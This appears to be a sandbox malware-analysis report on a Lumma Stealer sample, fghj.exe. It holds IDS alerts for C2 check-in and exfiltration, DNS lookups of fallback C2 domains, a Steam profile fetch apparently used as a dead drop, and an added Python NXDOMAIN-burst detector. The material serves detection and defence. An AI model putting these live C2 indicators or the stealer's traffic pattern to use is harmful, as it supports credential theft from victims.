2025-01-10T11:47:50.086323+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49826 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:50.524034+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.9 | 49826 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:50.524034+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49826 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:51.162537+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49832 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:51.650332+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.9 | 49832 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:51.650332+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49832 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:52.739731+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49844 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:53.982728+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49850 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:55.356824+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49861 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:56.746110+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49872 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:57.480901+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.9 | 49872 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:58.052478+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49878 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:59.062810+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49889 | 104.21.96.1 | 443 | TCP
2025-01-10T11:47:59.546802+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.9 | 49889 | 104.21.96.1 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.606631041 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.086246014 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.086323023 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.088036060 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.088047028 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.088299036 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.089379072 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.089391947 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.089461088 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524024963 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524131060 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524379969 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524379969 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524451971 CET49826443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.524477005 CET44349826104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.692883015 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.692948103 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.693015099 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.693422079 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:50.693434000 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.162465096 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.162537098 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.163784027 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.163795948 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.164053917 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.165143967 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.165189028 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.165214062 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650327921 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650378942 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650418043 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650465012 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650486946 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650557041 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650691986 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650764942 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650794029 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650841951 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650846958 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.650898933 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651176929 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651446104 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651479006 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651529074 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651534081 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.651581049 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.655092001 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.655183077 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.655260086 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.655267000 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.697127104 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740025043 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740153074 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740222931 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740406990 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740425110 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740436077 CET49832443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:51.740441084 CET44349832104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.240552902 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.240643978 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.240768909 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.264667988 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.264720917 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.739645004 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.739731073 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.740943909 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.740966082 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.741230011 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.742522001 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.742660046 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:52.742706060 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.309870005 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.309969902 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.310051918 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.310197115 CET49844443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.310242891 CET44349844104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.507956982 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.507997990 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.508136034 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.508425951 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.508460999 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.982547045 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.982728004 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.983993053 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.984019995 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.984354973 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.985618114 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.985657930 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.985692978 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.985795975 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:53.985804081 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.496323109 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.496402979 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.497273922 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.497273922 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.806499958 CET49850443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.806529045 CET44349850104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.899338961 CET49861443192.168.2.9104.21.96.1
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.899378061 CET44349861104.21.96.1192.168.2.9
                                                                                                                                                                                                                  Jan 10, 2025 11:47:54.900413036 CET49861443192.168.2.9104.21.96.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--------- | --------- | ------- | -------- | ------- | ---- | ---- | ----- | --------------
Jan 10, 2025 11:47:48.139605999 CET | 192.168.2.9 | 1.1.1.1 | 0x701e | Standard query (0) | spellshagey.biz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.152069092 CET | 192.168.2.9 | 1.1.1.1 | 0xbc7e | Standard query (0) | immureprech.biz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.166347027 CET | 192.168.2.9 | 1.1.1.1 | 0xb743 | Standard query (0) | deafeninggeh.biz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.180277109 CET | 192.168.2.9 | 1.1.1.1 | 0xbc92 | Standard query (0) | effecterectz.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.191792965 CET | 192.168.2.9 | 1.1.1.1 | 0x9683 | Standard query (0) | diffuculttan.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.202766895 CET | 192.168.2.9 | 1.1.1.1 | 0x1374 | Standard query (0) | debonairnukk.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.218852043 CET | 192.168.2.9 | 1.1.1.1 | 0xe6dd | Standard query (0) | wrathful-jammy.cyou | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.229944944 CET | 192.168.2.9 | 1.1.1.1 | 0x7b84 | Standard query (0) | awake-weaves.cyou | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.240914106 CET | 192.168.2.9 | 1.1.1.1 | 0xbc98 | Standard query (0) | sordid-snaked.cyou | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.251861095 CET | 192.168.2.9 | 1.1.1.1 | 0x6673 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:49.569968939 CET | 192.168.2.9 | 1.1.1.1 | 0xd600 | Standard query (0) | sputnik-1985.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
--------- | --------- | ------- | -------- | ---------- | ---- | ----- | ------- | ---- | ----- | --------------
Jan 10, 2025 11:47:29.928081989 CET | 1.1.1.1 | 192.168.2.9 | 0x8036 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 11:47:29.928081989 CET | 1.1.1.1 | 192.168.2.9 | 0x8036 | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | s-part-0017.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 11:47:29.928081989 CET | 1.1.1.1 | 192.168.2.9 | 0x8036 | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | | 13.107.253.45 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.150283098 CET | 1.1.1.1 | 192.168.2.9 | 0x701e | Name error (3) | spellshagey.biz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.163085938 CET | 1.1.1.1 | 192.168.2.9 | 0xbc7e | Name error (3) | immureprech.biz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.178050995 CET | 1.1.1.1 | 192.168.2.9 | 0xb743 | Name error (3) | deafeninggeh.biz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.189517975 CET | 1.1.1.1 | 192.168.2.9 | 0xbc92 | Name error (3) | effecterectz.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.200459003 CET | 1.1.1.1 | 192.168.2.9 | 0x9683 | Name error (3) | diffuculttan.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.216598034 CET | 1.1.1.1 | 192.168.2.9 | 0x1374 | Name error (3) | debonairnukk.xyz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.227627039 CET | 1.1.1.1 | 192.168.2.9 | 0xe6dd | Name error (3) | wrathful-jammy.cyou | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.238814116 CET | 1.1.1.1 | 192.168.2.9 | 0x7b84 | Name error (3) | awake-weaves.cyou | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.249902964 CET | 1.1.1.1 | 192.168.2.9 | 0xbc98 | Name error (3) | sordid-snaked.cyou | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:48.258569956 CET | 1.1.1.1 | 192.168.2.9 | 0x6673 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:49.605536938 CET | 1.1.1.1 | 192.168.2.9 | 0xd600 | No error (0) | sputnik-1985.com | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:49.605536938 CET | 1.1.1.1 | 192.168.2.9 | 0xd600 | No error (0) | sputnik-1985.com | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:49.605536938 CET | 1.1.1.1 | 192.168.2.9 | 0xd600 | No error (0) | sputnik-1985.com | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:47:49.605536938 CET | 1.1.1.1 | 192.168.2.9 | 0xd600 | No error (0) | sputnik-1985.com | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET1.1.1.1192.168.2.90xd600No error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET1.1.1.1192.168.2.90xd600No error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Jan 10, 2025 11:47:49.605536938 CET1.1.1.1192.168.2.90xd600No error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                  • sputnik-1985.com
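The seven "Name error (3)" answers above arrive within about 80 ms of each other, steamcommunity.com resolves immediately after them, and sputnik-1985.com resolves roughly 1.3 s later. The following Python is an added example, not part of the Joe Sandbox report: it parses rows in the table's format, lists which names actually resolved, and flags a burst of NXDOMAIN answers that is followed by a successful resolution (a client walking a fallback list until one name answers). The input lines are copied from the table; the window and count thresholds are assumptions chosen to fit this capture.

```python
"""DNS triage over the answers the sandbox recorded for fghj.exe. Added example,
not part of the Joe Sandbox report: parse the rows, list what resolved, and flag
a burst of NXDOMAIN answers followed almost immediately by a successful one."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed input: the report's DNS rows re-typed as
# "timestamp | reply code | name | address" (values copied from the table).
DNS_LOG = """\
Jan 10, 2025 11:47:48.178050995 CET | Name error (3) | deafeninggeh.biz | none
Jan 10, 2025 11:47:48.189517975 CET | Name error (3) | effecterectz.xyz | none
Jan 10, 2025 11:47:48.200459003 CET | Name error (3) | diffuculttan.xyz | none
Jan 10, 2025 11:47:48.216598034 CET | Name error (3) | debonairnukk.xyz | none
Jan 10, 2025 11:47:48.227627039 CET | Name error (3) | wrathful-jammy.cyou | none
Jan 10, 2025 11:47:48.238814116 CET | Name error (3) | awake-weaves.cyou | none
Jan 10, 2025 11:47:48.249902964 CET | Name error (3) | sordid-snaked.cyou | none
Jan 10, 2025 11:47:48.258569956 CET | No error (0) | steamcommunity.com | 104.102.49.254
Jan 10, 2025 11:47:49.605536938 CET | No error (0) | sputnik-1985.com | 104.21.96.1
Jan 10, 2025 11:47:49.605536938 CET | No error (0) | sputnik-1985.com | 104.21.112.1
"""

TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) \w+$")
RCODE_RE = re.compile(r"\((\d+)\)")          # "Name error (3)" -> 3
NXDOMAIN, NOERROR = 3, 0


def parse_timestamp(text: str) -> datetime:
    """The report prints nanoseconds; datetime keeps microseconds, so truncate."""
    m = TS_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    return base.replace(microsecond=int(m.group(2)[:6].ljust(6, "0")))


def parse_dns_log(text: str) -> list:
    """One dict per row: ts, rcode (int), name (lower-cased), address or None."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, rcode, name, address = (f.strip() for f in line.split("|"))
        records.append({
            "ts": parse_timestamp(ts),
            "rcode": int(RCODE_RE.search(rcode).group(1)),
            "name": name.lower(),
            "address": None if address == "none" else address,
        })
    return records


def resolved_names(records: list) -> dict:
    """name -> sorted list of addresses, successful answers only."""
    out = defaultdict(set)
    for r in records:
        if r["rcode"] == NOERROR and r["address"]:
            out[r["name"]].add(r["address"])
    return {name: sorted(addrs) for name, addrs in out.items()}


def nxdomain_bursts(records: list, window_s: float = 1.0, min_failures: int = 5) -> list:
    """Runs of >= min_failures NXDOMAIN answers inside window_s that are followed
    by a successful answer. Returns (failed_names, first_name_that_resolved)."""
    bursts, run = [], []
    for r in sorted(records, key=lambda rec: rec["ts"]):
        if r["rcode"] == NXDOMAIN:
            if run and (r["ts"] - run[0]["ts"]).total_seconds() > window_s:
                run = []                       # too spread out; start a new run
            run.append(r)
            continue
        if r["rcode"] == NOERROR and len(run) >= min_failures:
            bursts.append(([x["name"] for x in run], r["name"]))
        run = []
    return bursts


if __name__ == "__main__":
    recs = parse_dns_log(DNS_LOG)
    print("resolved:", resolved_names(recs))
    for failed, hit in nxdomain_bursts(recs):
        print(f"{len(failed)} NXDOMAIN answers in a row, then {hit} resolved: {failed}")
```

On this capture the burst detector returns one hit: the seven failed look-alike names, followed by steamcommunity.com. Tune `window_s` and `min_failures` to the resolver you monitor; on a busy network a burst of 2 or 3 is noise, seven within 80 ms from one process is not.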
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49815 | 104.102.49.254 | 443 | 7372 | C:\Users\user\Desktop\fghj.exe

Timestamp | Bytes transferred | Direction | Data

2025-01-10 10:47:49 UTC | 219 | OUT
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com

2025-01-10 10:47:49 UTC | 1905 | IN
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Fri, 10 Jan 2025 10:47:49 GMT
    Content-Length: 35126
    Connection: close
    Set-Cookie: sessionid=36040cf56fdd0806ec6424e9; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None

2025-01-10 10:47:49 UTC | 14479 | IN
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>

2025-01-10 10:47:49 UTC | 16384 | IN
    Data Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
    Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO

2025-01-10 10:47:49 UTC | 3768 | IN
    Data Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
    Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_

2025-01-10 10:47:49 UTC | 495 | IN
